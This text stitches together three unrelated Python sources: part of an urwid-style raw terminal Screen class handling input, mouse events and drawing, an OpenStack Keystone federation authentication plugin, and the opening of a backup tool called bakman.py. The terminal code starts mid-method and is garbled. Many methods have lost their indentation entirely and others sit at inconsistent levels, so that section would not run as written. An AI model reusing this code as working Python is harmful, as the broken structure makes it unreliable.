        self.tty_signal_keys(*(self._old_signal_keys + (fd,)))

    super(Screen, self)._stop()
def write(self, data):
    """Write *data* to the terminal.

    Override this if you're using something other than regular files
    for input and output.
    """
    self._term_output_file.write(data)

def flush(self):
    """Flush the output buffer.

    Override this if you're using something other than regular files
    for input and output.
    """
    self._term_output_file.flush()
def get_input(self, raw_keys=False):
    """Return pending input as a list.

    raw_keys -- return raw keycodes as well as translated versions

    This function will immediately return all the input since the
    last time it was called.  If there is no input pending it will
    wait before returning an empty list.  The wait time may be
    configured with the set_input_timeouts function.

    If raw_keys is False (default) this function will return a list
    of keys pressed.  If raw_keys is True this function will return
    a ( keys pressed, raw keycodes ) tuple instead.

    Examples of keys returned:

    * ASCII printable characters:  " ", "a", "0", "A", "-", "/"
    * ASCII control characters:  "tab", "enter"
    * Escape sequences:  "up", "page up", "home", "insert", "f1"
    * Key combinations:  "shift f1", "meta a", "ctrl b"
    * Window events:  "window resize"

    When a narrow encoding is not enabled:

    * "Extended ASCII" characters:  "\\xa1", "\\xb2", "\\xfe"

    When a wide encoding is enabled:

    * Double-byte characters:  "\\xa1\\xea", "\\xb2\\xd4"

    When utf8 encoding is enabled:

    * Unicode characters: u"\\u00a5", u'\\u253c"

    Examples of mouse events returned:

    * Mouse button press: ('mouse press', 1, 15, 13),
      ('meta mouse press', 2, 17, 23)
    * Mouse drag: ('mouse drag', 1, 16, 13),
      ('mouse drag', 1, 17, 13),
      ('ctrl mouse drag', 1, 18, 13)
    * Mouse button release: ('mouse release', 0, 18, 13),
      ('ctrl mouse release', 0, 17, 23)
    """
    assert self._started

    self._wait_for_input_ready(self._next_timeout)
    # event_loop/callback are None: fully synchronous parse (see parse_input).
    keys, raw = self.parse_input(None, None, self.get_available_raw_input())

    # Avoid pegging CPU at 100% when slowly resizing: after a resize keep
    # absorbing further input (and resizes) for resize_wait seconds.
    if keys == ['window resize'] and self.prev_input_resize:
        while True:
            self._wait_for_input_ready(self.resize_wait)
            keys, raw2 = self.parse_input(None, None, self.get_available_raw_input())
            raw += raw2
            #if not keys:
            #    keys, raw2 = self._get_input(
            #        self.resize_wait)
            #    raw += raw2
            if keys != ['window resize']:
                break
        # Make sure the resize is still reported even when other keys
        # arrived during the debounce window.
        if keys[-1:] != ['window resize']:
            keys.append('window resize')

    # Track consecutive resize-only reads: 2 -> just resized,
    # 1 -> resized last time with nothing since, 0 -> normal input.
    if keys == ['window resize']:
        self.prev_input_resize = 2
    elif self.prev_input_resize == 2 and not keys:
        self.prev_input_resize = 1
    else:
        self.prev_input_resize = 0

    if raw_keys:
        return keys, raw
    return keys
def get_input_descriptors(self):
    """
    Return a list of integer file descriptors that should be
    polled in external event loops to check for user input.

    Use this method if you are implementing your own event loop.
    """
    if not self._started:
        return []

    descriptors = [self._term_input_file.fileno(), self._resize_pipe_rd]
    if self.gpm_mev is not None:
        descriptors.append(self.gpm_mev.stdout.fileno())
    return descriptors

_current_event_loop_handles = ()

def unhook_event_loop(self, event_loop):
    """
    Remove any hooks added by hook_event_loop.
    """
    for handle in self._current_event_loop_handles:
        event_loop.remove_watch_file(handle)

    if self._input_timeout:
        event_loop.remove_alarm(self._input_timeout)
        self._input_timeout = None
def hook_event_loop(self, event_loop, callback):
    """
    Register the given callback with the event loop, to be called with new
    input whenever it's available.  The callback should be passed a list of
    processed keys and a list of unprocessed keycodes.

    Subclasses may wish to use parse_input to wrap the callback.
    """
    if hasattr(self, 'get_input_nonblocking'):
        wrapper = self._make_legacy_input_wrapper(event_loop, callback)
    else:
        wrapper = lambda: self.parse_input(
            event_loop, callback, self.get_available_raw_input())
    fds = self.get_input_descriptors()
    # BUG FIX: keep the handles returned by watch_file.  Previously
    # `handles` was left empty, so unhook_event_loop could never remove
    # the file watches this method installed.
    handles = [event_loop.watch_file(fd, wrapper) for fd in fds]
    self._current_event_loop_handles = handles
_input_timeout = None   # pending event-loop alarm handle, if any
_partial_codes = None   # keycodes held back while awaiting an escape tail

def _make_legacy_input_wrapper(self, event_loop, callback):
    """
    Support old Screen classes that still have a get_input_nonblocking and
    expect it to work.
    """
    def wrapper():
        # Cancel any previously scheduled retry alarm.
        if self._input_timeout:
            event_loop.remove_alarm(self._input_timeout)
            self._input_timeout = None
        timeout, keys, raw = self.get_input_nonblocking()
        if timeout is not None:
            # Re-arm: poll again after the timeout the screen asked for.
            self._input_timeout = event_loop.alarm(timeout, wrapper)

        callback(keys, raw)

    return wrapper
def get_available_raw_input(self):
    """
    Return any currently-available input.  Does not block.

    This method is only used by the default `hook_event_loop`
    implementation; you can safely ignore it if you implement your own.
    """
    codes = self._get_gpm_codes() + self._get_keyboard_codes()

    # Prepend any keycodes held back from an incomplete escape sequence.
    if self._partial_codes:
        codes = self._partial_codes + codes
        self._partial_codes = None

    # Drain the self-pipe used to wake external event loops on resize.
    try:
        while True:
            os.read(self._resize_pipe_rd, 1)
    except OSError:
        pass

    return codes
    def parse_input(self, event_loop, callback, codes, wait_for_more=True):
        """
        Read any available input from get_available_raw_input, parses it into
        keys, and calls the given callback.

        The current implementation tries to avoid any assumptions about what
        the screen or event loop look like; it only deals with parsing keycodes
        and setting a timeout when an incomplete one is detected.

        `codes` should be a sequence of keycodes, i.e. bytes.  A bytearray is
        appropriate, but beware of using bytes, which only iterates as integers
        on Python 3.
        """
        # Note: event_loop may be None for 100% synchronous support, only used
        # by get_input. Not documented because you shouldn't be doing it.
        if self._input_timeout and event_loop:
            event_loop.remove_alarm(self._input_timeout)
            self._input_timeout = None
        original_codes = codes
        processed = []
        try:
            while codes:
                run, codes = escape.process_keyqueue(
                    codes, wait_for_more)
                processed.extend(run)
        except escape.MoreInputRequired:
            # Set a timer to wait for the rest of the input; if it goes off
            # without any new input having come in, use the partial input
            k = len(original_codes) - len(codes)
            processed_codes = original_codes[:k]
            self._partial_codes = codes
            # Re-parse the stashed partial sequence on its own, accepting
            # whatever incomplete escape sequence we ended up with.
            def _parse_incomplete_input():
                self._input_timeout = None
                self._partial_codes = None
                self.parse_input(
                    event_loop, callback, codes, wait_for_more=False)
            if event_loop:
                self._input_timeout = event_loop.alarm(
                    self.complete_wait, _parse_incomplete_input)
        else:
            # Everything parsed cleanly; nothing is left outstanding.
            processed_codes = original_codes
            self._partial_codes = None
        if self._resized:
            processed.append('window resize')
            self._resized = False
        if callback:
            callback(processed, processed_codes)
        else:
            # For get_input
            return processed, processed_codes
def _get_keyboard_codes(self):
codes = []
while True:
code = self._getch_nodelay()
if code < 0:
break
codes.append(code)
return codes
    def _get_gpm_codes(self):
        """Translate all pending GPM mouse events into keycode sequences."""
        codes = []
        try:
            while self.gpm_mev is not None and self.gpm_event_pending:
                codes.extend(self._encode_gpm_event())
        except IOError as e:
            if e.args[0] != 11:  # errno 11 == EAGAIN: no more data right now
                raise
        return codes
    def _wait_for_input_ready(self, timeout):
        """
        select() on the terminal (and the GPM pipe, when mouse tracking is
        active) until input is ready or *timeout* seconds have passed.
        Returns the list of ready file descriptors (empty on timeout or
        when interrupted by a resize).
        """
        ready = None
        fd_list = [self._term_input_file.fileno()]
        if self.gpm_mev is not None:
            fd_list.append(self.gpm_mev.stdout.fileno())
        while True:
            try:
                if timeout is None:
                    ready,w,err = select.select(
                        fd_list, [], fd_list)
                else:
                    ready,w,err = select.select(
                        fd_list,[],fd_list, timeout)
                break
            except select.error as e:
                if e.args[0] != 4:  # errno 4 == EINTR: retry the select
                    raise
                if self._resized:
                    # Interrupted by SIGWINCH: report no input so the
                    # caller can deal with the resize first.
                    ready = []
                    break
        return ready
def _getch(self, timeout):
ready = self._wait_for_input_ready(timeout)
if self.gpm_mev is not None:
if self.gpm_mev.stdout.fileno() in ready:
self.gpm_event_pending = True
if self._term_input_file.fileno() in ready:
return ord(os.read(self._term_input_file.fileno(), 1))
return -1
    def _encode_gpm_event( self ):
        """
        Read one line of GPM 'mev' output and translate it into an
        xterm-style mouse escape sequence (returned as a list of ints).
        """
        self.gpm_event_pending = False
        s = self.gpm_mev.stdout.readline().decode('ascii')
        l = s.split(",")
        if len(l) != 6:
            # unexpected output, stop tracking
            self._stop_gpm_tracking()
            signals.emit_signal(self, INPUT_DESCRIPTORS_CHANGED)
            return []
        # mev fields: event type, x, y, (ignored), buttons, modifiers
        ev, x, y, ign, b, m = s.split(",")
        ev = int( ev.split("x")[-1], 16)
        x = int( x.split(" ")[-1] )
        y = int( y.lstrip().split(" ")[0] )
        b = int( b.split(" ")[-1] )
        m = int( m.split("x")[-1].rstrip(), 16 )
        # convert to xterm-like escape sequence
        # last/next track which buttons were/are held down across events
        last = next = self.last_bstate
        l = []
        mod = 0
        if m & 1: mod |= 4 # shift
        if m & 10: mod |= 8 # alt
        if m & 4: mod |= 16 # ctrl
        # Append one xterm mouse report: ESC [ M <button> <x> <y> (+32 each)
        def append_button( b ):
            b |= mod
            l.extend([ 27, ord('['), ord('M'), b+32, x+32, y+32 ])
        # NOTE(review): this helper is never called in this method, and the
        # bare "next |= ..." assignments could not update the enclosing
        # scope anyway -- looks like dead code; confirm before removing.
        def determine_button_release( flag ):
            if b & 4 and last & 1:
                append_button( 0 + flag )
                next |= 1
            if b & 2 and last & 2:
                append_button( 1 + flag )
                next |= 2
            if b & 1 and last & 4:
                append_button( 2 + flag )
                next |= 4
        if ev == 20 or ev == 36 or ev == 52: # press
            if b & 4 and last & 1 == 0:
                append_button( 0 )
                next |= 1
            if b & 2 and last & 2 == 0:
                append_button( 1 )
                next |= 2
            if b & 1 and last & 4 == 0:
                append_button( 2 )
                next |= 4
        elif ev == 146: # drag
            if b & 4:
                append_button( 0 + escape.MOUSE_DRAG_FLAG )
            elif b & 2:
                append_button( 1 + escape.MOUSE_DRAG_FLAG )
            elif b & 1:
                append_button( 2 + escape.MOUSE_DRAG_FLAG )
        else: # release
            if b & 4 and last & 1:
                append_button( 0 + escape.MOUSE_RELEASE_FLAG )
                next &= ~ 1
            if b & 2 and last & 2:
                append_button( 1 + escape.MOUSE_RELEASE_FLAG )
                next &= ~ 2
            if b & 1 and last & 4:
                append_button( 2 + escape.MOUSE_RELEASE_FLAG )
                next &= ~ 4
        if ev == 40: # double click (release)
            if b & 4 and last & 1:
                append_button( 0 + escape.MOUSE_MULTIPLE_CLICK_FLAG )
            if b & 2 and last & 2:
                append_button( 1 + escape.MOUSE_MULTIPLE_CLICK_FLAG )
            if b & 1 and last & 4:
                append_button( 2 + escape.MOUSE_MULTIPLE_CLICK_FLAG )
        elif ev == 52:
            # triple click: multiple-click flag doubled
            if b & 4 and last & 1:
                append_button( 0 + escape.MOUSE_MULTIPLE_CLICK_FLAG*2 )
            if b & 2 and last & 2:
                append_button( 1 + escape.MOUSE_MULTIPLE_CLICK_FLAG*2 )
            if b & 1 and last & 4:
                append_button( 2 + escape.MOUSE_MULTIPLE_CLICK_FLAG*2 )
        self.last_bstate = next
        return l
    def _getch_nodelay(self):
        # Non-blocking read: a timeout of 0 returns immediately (-1 if idle).
        return self._getch(0)
def get_cols_rows(self):
"""Return the terminal dimensions (num columns, num rows)."""
y, x = 80, 24
try:
buf = fcntl.ioctl(self._term_output_file.fileno(),
termios.TIOCGWINSZ, ' '*4)
y, x = struct.unpack('hh', buf)
except IOError:
# Term size could not be determined
pass
self.maxrow = y
return x, y
    def _setup_G1(self):
        """
        Initialize the G1 character set to graphics mode if required.
        """
        if self._setup_G1_done:
            return
        # Retry until the escape sequence is written without the write/flush
        # being interrupted (IOError, e.g. EINTR).
        while True:
            try:
                self.write(escape.DESIGNATE_G1_SPECIAL)
                self.flush()
                break
            except IOError:
                pass
        self._setup_G1_done = True
    # NOTE: Python 2 tuple-parameter syntax; this module is Python 2 only.
    def draw_screen(self, (maxcol, maxrow), r ):
        """Paint screen with rendered canvas.

        Builds a list of output fragments (escape sequences and text runs)
        in o, diffing each row against the previous screen buffer so that
        unchanged rows are skipped, then writes everything in one pass.
        """
        assert self._started
        assert maxrow == r.rows()
        # quick return if nothing has changed
        if self.screen_buf and r is self._screen_buf_canvas:
            return
        self._setup_G1()
        if self._resized:
            # handle resize before trying to draw screen
            return
        o = [escape.HIDE_CURSOR, self._attrspec_to_escape(AttrSpec('',''))]
        def partial_display():
            # returns True if the screen is in partial display mode
            # ie. only some rows belong to the display
            return self._rows_used is not None
        if not partial_display():
            o.append(escape.CURSOR_HOME)
        if self.screen_buf:
            osb = self.screen_buf
        else:
            osb = []
        sb = []
        cy = self._cy
        y = -1
        # Cursor-movement helpers: in partial display mode absolute cursor
        # positioning is unavailable, so movement is relative to cy.
        def set_cursor_home():
            if not partial_display():
                return escape.set_cursor_position(0, 0)
            return (escape.CURSOR_HOME_COL +
                escape.move_cursor_up(cy))
        # NOTE(review): set_cursor_row is defined but not used below.
        def set_cursor_row(y):
            if not partial_display():
                return escape.set_cursor_position(0, y)
            return escape.move_cursor_down(y - cy)
        def set_cursor_position(x, y):
            if not partial_display():
                return escape.set_cursor_position(x, y)
            if cy > y:
                return ('\b' + escape.CURSOR_HOME_COL +
                    escape.move_cursor_up(cy - y) +
                    escape.move_cursor_right(x))
            return ('\b' + escape.CURSOR_HOME_COL +
                escape.move_cursor_down(y - cy) +
                escape.move_cursor_right(x))
        def is_blank_row(row):
            if len(row) > 1:
                return False
            if row[0][2].strip():
                return False
            return True
        def attr_to_escape(a):
            if a in self._pal_escape:
                return self._pal_escape[a]
            elif isinstance(a, AttrSpec):
                return self._attrspec_to_escape(a)
            # undefined attributes use default/default
            # TODO: track and report these
            return self._attrspec_to_escape(
                AttrSpec('default','default'))
        def using_standout(a):
            a = self._pal_attrspec.get(a, a)
            return isinstance(a, AttrSpec) and a.standout
        ins = None
        o.append(set_cursor_home())
        cy = 0
        for row in r.content():
            y += 1
            if osb and osb[y] == row:
                # this row of the screen buffer matches what is
                # currently displayed, so we can skip this line
                sb.append( osb[y] )
                continue
            sb.append(row)
            # leave blank lines off display when we are using
            # the default screen buffer (allows partial screen)
            if partial_display() and y > self._rows_used:
                if is_blank_row(row):
                    continue
                self._rows_used = y
            if y or partial_display():
                o.append(set_cursor_position(0, y))
            # after updating the line we will be just over the
            # edge, but terminals still treat this as being
            # on the same line
            cy = y
            whitespace_at_end = False
            if row:
                a, cs, run = row[-1]
                # use erase-to-end-of-line instead of writing trailing spaces
                # when the terminal supports back-color-erase
                if (run[-1:] == B(' ') and self.back_color_erase
                        and not using_standout(a)):
                    whitespace_at_end = True
                    row = row[:-1] + [(a, cs, run.rstrip(B(' ')))]
                elif y == maxrow-1 and maxcol > 1:
                    # bottom-right cell needs the insert trick from _last_row
                    row, back, ins = self._last_row(row)
            first = True
            lasta = lastcs = None
            for (a,cs, run) in row:
                assert isinstance(run, bytes) # canvases should render with bytes
                if cs != 'U':
                    run = run.translate(UNPRINTABLE_TRANS_TABLE)
                if first or lasta != a:
                    o.append(attr_to_escape(a))
                    lasta = a
                if first or lastcs != cs:
                    assert cs in [None, "0", "U"], repr(cs)
                    if lastcs == "U":
                        o.append( escape.IBMPC_OFF )
                    if cs is None:
                        o.append( escape.SI )
                    elif cs == "U":
                        o.append( escape.IBMPC_ON )
                    else:
                        o.append( escape.SO )
                    lastcs = cs
                o.append( run )
                first = False
            if ins:
                (inserta, insertcs, inserttext) = ins
                ias = attr_to_escape(inserta)
                assert insertcs in [None, "0", "U"], repr(insertcs)
                # NOTE(review): these branches test cs (charset of the last
                # run) rather than insertcs -- verify whether insertcs was
                # intended here.
                if cs is None:
                    icss = escape.SI
                elif cs == "U":
                    icss = escape.IBMPC_ON
                else:
                    icss = escape.SO
                o += [ "\x08"*back,
                    ias, icss,
                    escape.INSERT_ON, inserttext,
                    escape.INSERT_OFF ]
                if cs == "U":
                    o.append(escape.IBMPC_OFF)
            if whitespace_at_end:
                o.append(escape.ERASE_IN_LINE_RIGHT)
        if r.cursor is not None:
            x,y = r.cursor
            o += [set_cursor_position(x, y),
                escape.SHOW_CURSOR ]
            self._cy = y
        if self._resized:
            # handle resize before trying to draw screen
            return
        try:
            for l in o:
                if isinstance(l, bytes) and PYTHON3:
                    l = l.decode('utf-8')
                self.write(l)
            self.flush()
        except IOError as e:
            # ignore interrupted syscall
            if e.args[0] != 4:
                raise
        self.screen_buf = sb
        self._screen_buf_canvas = r
    def _last_row(self, row):
        """On the last row we need to slide the bottom right character
        into place. Calculate the new line, attr and an insert sequence
        to do that.

        eg. last row:
        XXXXXXXXXXXXXXXXXXXXYZ

        Y will be drawn after Z, shifting Z into position.

        Returns (new_row, back, ins) where new_row is the row without the
        final screen column, back is how many columns to backspace, and
        ins is the (attr, cs, text) segment to insert.
        """
        new_row = row[:-1]
        z_attr, z_cs, last_text = row[-1]
        # split off the final screen column (may be a wide character)
        last_cols = util.calc_width(last_text, 0, len(last_text))
        last_offs, z_col = util.calc_text_pos(last_text, 0,
            len(last_text), last_cols-1)
        if last_offs == 0:
            # the last segment is exactly the final column wide
            z_text = last_text
            del new_row[-1]
            # we need another segment
            y_attr, y_cs, nlast_text = row[-2]
            nlast_cols = util.calc_width(nlast_text, 0,
                len(nlast_text))
            z_col += nlast_cols
            nlast_offs, y_col = util.calc_text_pos(nlast_text, 0,
                len(nlast_text), nlast_cols-1)
            y_text = nlast_text[nlast_offs:]
            if nlast_offs:
                new_row.append((y_attr, y_cs,
                    nlast_text[:nlast_offs]))
        else:
            # both Y and Z come from the same (last) segment
            z_text = last_text[last_offs:]
            y_attr, y_cs = z_attr, z_cs
            nlast_cols = util.calc_width(last_text, 0,
                last_offs)
            nlast_offs, y_col = util.calc_text_pos(last_text, 0,
                last_offs, nlast_cols-1)
            y_text = last_text[nlast_offs:last_offs]
            if nlast_offs:
                new_row.append((y_attr, y_cs,
                    last_text[:nlast_offs]))
        new_row.append((z_attr, z_cs, z_text))
        return new_row, z_col-y_col, (y_attr, y_cs, y_text)
def clear(self):
"""
Force the screen to be completely repainted on the next
call to draw_screen().
"""
self.screen_buf = None
self.setup_G1 = True
def _attrspec_to_escape(self, a):
"""
Convert AttrSpec instance a to an escape sequence for the terminal
>>> s = Screen()
>>> s.set_terminal_properties(colors=256)
>>> a2e = s._attrspec_to_escape
>>> a2e(s.AttrSpec('brown', 'dark green'))
'\\x1b[0;33;42m'
>>> a2e(s.AttrSpec('#fea,underline', '#d0d'))
'\\x1b[0;38;5;229;4;48;5;164m'
"""
if a.foreground_high:
fg = "38;5;%d" % a.foreground_number
elif a.foreground_basic:
if a.foreground_number > 7:
if self.fg_bright_is_bold:
fg = "1;%d" % (a.foreground_number - 8 + 30)
else:
fg = "%d" % (a.foreground_number - 8 + 90)
else:
fg = "%d" % (a.foreground_number + 30)
else:
fg = "39"
st = ("1;" * a.bold + "4;" * a.underline +
"5;" * a.blink + "7;" * a.standout)
if a.background_high:
bg = "48;5;%d" % a.background_number
elif a.background_basic:
if a.background_number > 7:
if self.bg_bright_is_blink:
bg = "5;%d" % (a.background_number - 8 + 40)
else:
# this doesn't work on most terminals
bg = "%d" % (a.background_number + 100)
else:
bg = "%d" % (a.background_number + 40)
else:
bg = "49"
return escape.ESC + "[0;%s;%s%sm" % (fg, st, bg)
def set_terminal_properties(self, colors=None, bright_is_bold=None,
has_underline=None):
"""
colors -- number of colors terminal supports (1, 16, 88 or 256)
or None to leave unchanged
bright_is_bold -- set to True if this terminal uses the bold
setting to create bright colors (numbers 8-15), set to False
if this Terminal can create bright colors without bold or
None to leave unchanged
has_underline -- set to True if this terminal can use the
underline setting, False if it cannot or None to leave
unchanged
"""
if colors is None:
colors = self.colors
if bright_is_bold is None:
bright_is_bold = self.fg_bright_is_bold
if has_underline is None:
has_underline = self.has_underline
if colors == self.colors and bright_is_bold == self.fg_bright_is_bold \
and has_underline == self.has_underline:
return
self.colors = colors
self.fg_bright_is_bold = bright_is_bold
self.has_underline = has_underline
self.clear()
self._pal_escape = {}
for p,v in self._palette.items():
self._on_update_palette_entry(p, *v)
    def reset_default_terminal_palette(self):
        """
        Attempt to set the terminal palette to default values as taken
        from xterm.

        Uses number of colors from current
        set_terminal_properties() screen setting.
        """
        # monochrome terminals have no palette to reset
        if self.colors == 1:
            return
        def rgb_values(n):
            # "h%d" selects palette entry n by number; 16-color screens go
            # through the 256-color space to pick up xterm's RGB values.
            if self.colors == 16:
                aspec = AttrSpec("h%d"%n, "", 256)
            else:
                aspec = AttrSpec("h%d"%n, "", self.colors)
            return aspec.get_rgb_values()[:3]
        entries = [(n,) + rgb_values(n) for n in range(self.colors)]
        self.modify_terminal_palette(entries)
def modify_terminal_palette(self, entries):
"""
entries - list of (index, red, green, blue) tuples.
Attempt to set part of the terminal palette (this does not work
on all terminals.) The changes are sent as a single escape
sequence so they should all take effect at the same time.
0 <= index < 256 (some terminals will only have 16 or 88 colors)
0 <= red, green, blue < 256
"""
modify = ["%d;rgb:%02x/%02x/%02x" % (index, red, green, blue)
for index, red, green, blue in entries]
self.write("\x1b]4;"+";".join(modify)+"\x1b\\")
self.flush()
# shortcut for creating an AttrSpec with this screen object's
# number of colors
AttrSpec = lambda self, fg, bg: AttrSpec(fg, bg, self.colors)
def _test():
    """Run this module's doctests."""
    import doctest
    doctest.testmod()
if __name__=='__main__':
    _test()
| |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
from oslo.serialization import jsonutils
from pycadf import cadftaxonomy as taxonomy
from six.moves.urllib import parse
from keystone import auth
from keystone.common import dependency
from keystone.contrib import federation
from keystone.contrib.federation import utils
from keystone import exception
from keystone.i18n import _
from keystone.models import token_model
from keystone import notifications
from keystone.openstack.common import log
LOG = log.getLogger(__name__)
@dependency.requires('assignment_api', 'federation_api', 'identity_api',
                     'token_provider_api')
class Mapped(auth.AuthMethodHandler):

    def _get_token_ref(self, auth_payload):
        """Validate and wrap the token referenced by the payload's ``id``."""
        token_id = auth_payload['id']
        token_data = self.token_provider_api.validate_token(token_id)
        return token_model.KeystoneToken(token_id=token_id,
                                         token_data=token_data)

    def authenticate(self, context, auth_payload, auth_context):
        """Authenticate mapped user and return an authentication context.

        :param context: keystone's request context
        :param auth_payload: the content of the authentication for a
                             given method
        :param auth_context: user authentication context, a dictionary
                             shared by all plugins.

        In addition to ``user_id`` in ``auth_context``, this plugin sets
        ``group_ids``, ``OS-FEDERATION:identity_provider`` and
        ``OS-FEDERATION:protocol``
        """
        # A payload carrying a token id means the user already holds an
        # unscoped federation token; otherwise this is a fresh
        # SAML-assertion login.
        if 'id' not in auth_payload:
            handle_unscoped_token(context, auth_payload, auth_context,
                                  self.assignment_api, self.federation_api,
                                  self.identity_api)
            return
        token_ref = self._get_token_ref(auth_payload)
        handle_scoped_token(context, auth_payload, auth_context, token_ref,
                            self.federation_api,
                            self.identity_api,
                            self.token_provider_api)
def handle_scoped_token(context, auth_payload, auth_context, token_ref,
                        federation_api, identity_api, token_provider_api):
    """Validate a scoped federation token and populate auth_context.

    A CADF audit notification is emitted for both outcomes; after a
    failure notification the original exception is re-raised.
    """
    utils.validate_expiration(token_ref)
    token_audit_id = token_ref.audit_id
    identity_provider = token_ref.federation_idp_id
    protocol = token_ref.federation_protocol_id
    user_id = token_ref.user_id
    group_ids = token_ref.federation_group_ids
    send_notification = functools.partial(
        notifications.send_saml_audit_notification, 'authenticate',
        context, user_id, group_ids, identity_provider, protocol,
        token_audit_id)

    try:
        mapping = federation_api.get_mapping_from_idp_and_protocol(
            identity_provider, protocol)
        utils.validate_groups(group_ids, mapping['id'], identity_api)
    except Exception:
        # Catch everything so a failed authentication is always audited,
        # then let the original error propagate.
        send_notification(taxonomy.OUTCOME_FAILURE)
        raise

    send_notification(taxonomy.OUTCOME_SUCCESS)
    auth_context['user_id'] = user_id
    auth_context['group_ids'] = group_ids
    auth_context[federation.IDENTITY_PROVIDER] = identity_provider
    auth_context[federation.PROTOCOL] = protocol
def handle_unscoped_token(context, auth_payload, auth_context,
                          assignment_api, federation_api, identity_api):
    """Authenticate a fresh SAML assertion and populate auth_context.

    A CADF audit notification is emitted for both outcomes; on failure the
    original exception is re-raised after the notification is sent.
    """
    assertion = extract_assertion_data(context)
    identity_provider = auth_payload['identity_provider']
    protocol = auth_payload['protocol']
    group_ids = None
    # NOTE(topol): The user is coming in from an IdP with a SAML assertion
    # instead of from a token, so we set token_id to None
    token_id = None
    # NOTE(marek-denis): This variable is set to None and there is a
    # possibility that it will be used in the CADF notification. This means
    # operation will not be mapped to any user (even ephemeral).
    user_id = None
    try:
        mapped_properties = apply_mapping_filter(identity_provider, protocol,
                                                 assertion, assignment_api,
                                                 federation_api, identity_api)
        user_id = setup_username(context, mapped_properties)
        group_ids = mapped_properties['group_ids']
    except Exception:
        # NOTE(topol): Diaper defense to catch any exception, so we can
        # send off failed authentication notification, raise the exception
        # after sending the notification
        outcome = taxonomy.OUTCOME_FAILURE
        notifications.send_saml_audit_notification('authenticate', context,
                                                   user_id, group_ids,
                                                   identity_provider,
                                                   protocol, token_id,
                                                   outcome)
        raise
    else:
        outcome = taxonomy.OUTCOME_SUCCESS
        notifications.send_saml_audit_notification('authenticate', context,
                                                   user_id, group_ids,
                                                   identity_provider,
                                                   protocol, token_id,
                                                   outcome)
    auth_context['user_id'] = user_id
    auth_context['group_ids'] = group_ids
    auth_context[federation.IDENTITY_PROVIDER] = identity_provider
    auth_context[federation.PROTOCOL] = protocol
def extract_assertion_data(context):
    """Return the SAML assertion parameters from the request environment."""
    return dict(utils.get_assertion_params_from_env(context))
def apply_mapping_filter(identity_provider, protocol, assertion,
                         assignment_api, federation_api, identity_api):
    """Apply the IdP/protocol mapping rules to a SAML assertion.

    Returns the mapped properties with ``group_ids`` replaced by the full,
    de-duplicated list of group ids (direct ids plus name/domain lookups).
    """
    mapping = federation_api.get_mapping_from_idp_and_protocol(
        identity_provider, protocol)
    rules = jsonutils.loads(mapping['rules'])
    LOG.debug('using the following rules: %s', rules)
    rule_processor = utils.RuleProcessor(rules)
    mapped_properties = rule_processor.process(assertion)
    # NOTE(marek-denis): We update group_ids only here to avoid fetching
    # groups identified by name/domain twice.
    # NOTE(marek-denis): Groups are translated from name/domain to their
    # corresponding ids in the auth plugin, as we need information what
    # ``mapping_id`` was used as well as identity_api and assignment_api
    # objects.
    group_ids = mapped_properties['group_ids']
    utils.validate_groups_in_backend(group_ids,
                                     mapping['id'],
                                     identity_api)
    group_ids.extend(
        utils.transform_to_group_ids(
            mapped_properties['group_names'], mapping['id'],
            identity_api, assignment_api))
    utils.validate_groups_cardinality(group_ids, mapping['id'])
    mapped_properties['group_ids'] = list(set(group_ids))
    return mapped_properties
def setup_username(context, mapped_properties):
    """Setup federated username.

    If ``user_name`` is specified in the mapped properties use this
    value.  Otherwise try fetching the value from the environment
    variable ``REMOTE_USER``.

    This method also url encodes user_name and saves this value in user_id.
    If user_name cannot be mapped raise exception.Unauthorized.

    :param context: authentication context
    :param mapped_properties: Properties issued by a RuleProcessor.
    :type: dictionary

    :raises: exception.Unauthorized
    :returns: the url-encoded user_name, used as the user_id
        (the old docstring claimed a tuple was returned; only the
        encoded id is)
    """
    user_name = mapped_properties['name']
    if user_name is None:
        user_name = context['environment'].get('REMOTE_USER')
        if user_name is None:
            raise exception.Unauthorized(_("Could not map user"))
    user_id = parse.quote(user_name)
    return user_id
| |
#!/usr/bin/env python
"""
bakman.py is a generic Linux backup tool. Backups are defined in a
Python-based configuration file as a set of parts that can be run
individually or in any sequence. Each part consists of one or more
steps that typically include mount, running of a backup, and unmount
actions.
bakman.py can both run simple backups of one or several partitions
into a single pre-mounted location, or it can create a mirror image of
the disk being backed up onto a separate "clone" disk. It can mount
encrypted or unencrypted volumes and partitions on the fly as needed.
"""
__author__ = 'Juerg Beringer'
__version__ = '$Id: bakman.py 2241 2017-10-18 02:19:20Z jb $'
__usage__ = """%prog [options] cmd [cmdargs...]
Examples:
bakman list list configurations (* means config is available)
bakman list bakdisk5 list parts in configuration bakdisk5 (* means part is available)
bakman dump bakdisk5 show details of bakdisk5 backup configuration
bakman -v run bakdisk5 run bakdisk5 backup with progress updates
bakman -v -V run bakdisk5 ditto, but show also all files being transferred
bakman -v --debug --dryrun run bakdisk5
ditto, but instead of executing commands show what would
be executed
bakman -e jb --batch bakdisk5 winhome
run part winhome of bakdisk5 backup without confirmation
dialog, then e-mail log to local user jb
bakman -m /bakman mount clonedisk3
mount all parts in clonedisk3 configuration under /bakman/clonedisk3
Commands are:
list list defined backup configurations
list NAME list parts in backup configuration NAME
dump NAME dump backup configuration NAME
run NAME [part...] run (including mount/unmount) all or selected part in configuration NAME
mount NAME [part...] mount all or selected part in configuration NAME
unmount NAME [part...] unmount all or selected part in configuration NAME
debug enter interactive debug mode
"""
import os
import sys
import commands
import time
import logging
import cmdhelper
from cmdhelper import *
#
# Default configuration and log files
#
try:
    # If config and log files are kept under $UEADM.  The '$UEADM' prefix
    # is left unexpanded here -- presumably expanded later by the shell
    # running the commands that use these paths; verify before changing.
    UEADM = os.environ['UEADM']
    EXCLUDEPATTERN = '$UEADM/etc/bakman.exclude'
    LOGFILE = '$UEADM/log/bakman.log'
    CONFIGFILE = '$UEADM/etc/bakman.conf.py'
    DATEFILE = '$UEADM/log/bakman.dates'
except KeyError:
    # BUG FIX: this fallback used a bare "except:", which also swallowed
    # KeyboardInterrupt/SystemExit.  Only a missing UEADM environment
    # variable should select the home-directory defaults.
    # General case: .bakman in user's home dir
    UEADM = os.path.join(os.path.expanduser('~'),'.bakman')
    EXCLUDEPATTERN = os.path.join(UEADM,'bakman.exclude')
    LOGFILE = os.path.join(UEADM,'bakman.log')
